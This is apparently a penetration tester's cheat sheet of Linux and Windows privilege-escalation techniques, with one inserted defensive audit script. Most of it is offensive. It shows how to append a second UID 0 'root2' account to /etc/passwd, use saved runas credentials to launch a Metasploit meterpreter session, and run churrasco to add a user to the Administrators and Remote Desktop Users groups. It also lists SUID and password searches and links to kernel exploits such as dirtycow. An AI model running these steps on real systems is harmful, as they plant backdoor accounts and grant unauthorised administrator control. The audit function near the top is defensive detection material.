Priv_Esc
===
Privilege escalation using passwd file
credit: https://security.stackexchange.com/questions/151700/privilege-escalation-using-passwd-file
# to generate hash of the password
openssl passwd mrcake
hKLD3431415ZE
# to create a second root user with "mrcake" password
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
# to switch to a root2
su root2
Password: mrcake
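Defender-side check for the trick above, added here as an example and not part of the original notes or the linked answer. It flags the precondition (passwd writable by group or other) and the result (a second UID 0 account, or a hash stored in field 2). audit_passwd is a hypothetical helper name and the sample file is constructed.

```shell
#!/bin/sh
# Added example, not part of the original notes. audit_passwd is a
# hypothetical helper name; the sample file below is constructed.

# Print one finding per line for a passwd-format file (default /etc/passwd).
audit_passwd() {
    file="${1:-/etc/passwd}"

    # Precondition of the trick: someone other than the owner can write the file.
    find "$file" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null |
        sed 's/^/WRITABLE_BY_GROUP_OR_OTHER /'

    awk -F: '
        $0 == ""  { next }
        NF != 7   { printf "MALFORMED line %d\n", NR; next }
        # Result of the trick: a second account that maps to UID 0.
        $3 == 0 && $1 != "root" { printf "EXTRA_UID0 %s\n", $1 }
        # Field 2 normally holds "x" (hash lives in /etc/shadow), or "*" / "!..."
        # for locked accounts. Anything else is a hash stored in passwd itself.
        $2 == ""  { printf "EMPTY_PASSWORD %s\n", $1; next }
        $2 != "x" && $2 != "*" && $2 !~ /^!/ { printf "INLINE_HASH %s\n", $1 }
    ' "$file"
}

# Constructed sample: two normal entries plus the root2 line from the notes.
sample=$(mktemp)
cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
EOF
audit_passwd "$sample"
rm -f "$sample"
```

Run it with no argument to audit /etc/passwd on the host itself.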
===
https://guif.re/linuxeop
https://guif.re/windowseop
https://netsec.ws/?p=337
http://asystemengineersnotebook.blogspot.com/2017/07/a-dirty-privilege-escalation-trick.html
https://hackmag.com/security/reach-the-root/
grep -Ri 'password' .
find / -perm -4000 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
https://docs.oracle.com/cd/E19683-01/816-4883/6mb2joatb/index.html
Windows
- Check if PowerShell is installed (C:\Windows\System32\WindowsPowerShell)
- Check if there is a priv esc script (PowerUp?)
- Check if there is a kernel exploit
- Check the programs running by checking the program files folder (look for old, outdated, vulnerable programs)
- Run cmdkey /list
So from the Windows cmd shell (through telnet), type "runas /user:ACCESS\Administrator /savecred" as per the above file contents, THEN paste the Metasploit PSH code AFTER this and it will pop a meterpreter session as Administrator.
https://github.com/GDSSecurity/Windows-Exploit-Suggester
http://www.fuzzysecurity.com/tutorials/16.html
http://pwnwiki.io/#!privesc/windows/index.md
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html?m=1
https://pentestlab.blog/2017/04/19/stored-credentials/
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe [-d] "command to run"
c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"
Linux
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/rebootuser/LinEnum
http://pwnwiki.io/#!privesc/linux/index.md
https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh
http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/
https://touhidshaikh.com/blog/?p=790
https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html
https://github.com/pentestmonkey/unix-privesc-check
Enumeration Scripts:
https://github.com/rebootuser/LinEnum
https://github.com/pentestmonkey/unix-privesc-check
https://github.com/sleventyeleven/linuxprivchecker
https://github.com/DominicBreuker/pspy
Binaries:
Linux:
https://github.com/FireFart/dirtycow
https://github.com/dirtycow/dirtycow.github.io
Windows:
https://github.com/breenmachine/RottenPotatoNG
NFS priv esc:
https://www.youtube.com/watch?v=l_AsXsMdkyM
https://medium.com/@Kan1shka9/hacklab-vulnix-walkthrough-b2b71534c0eb
https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/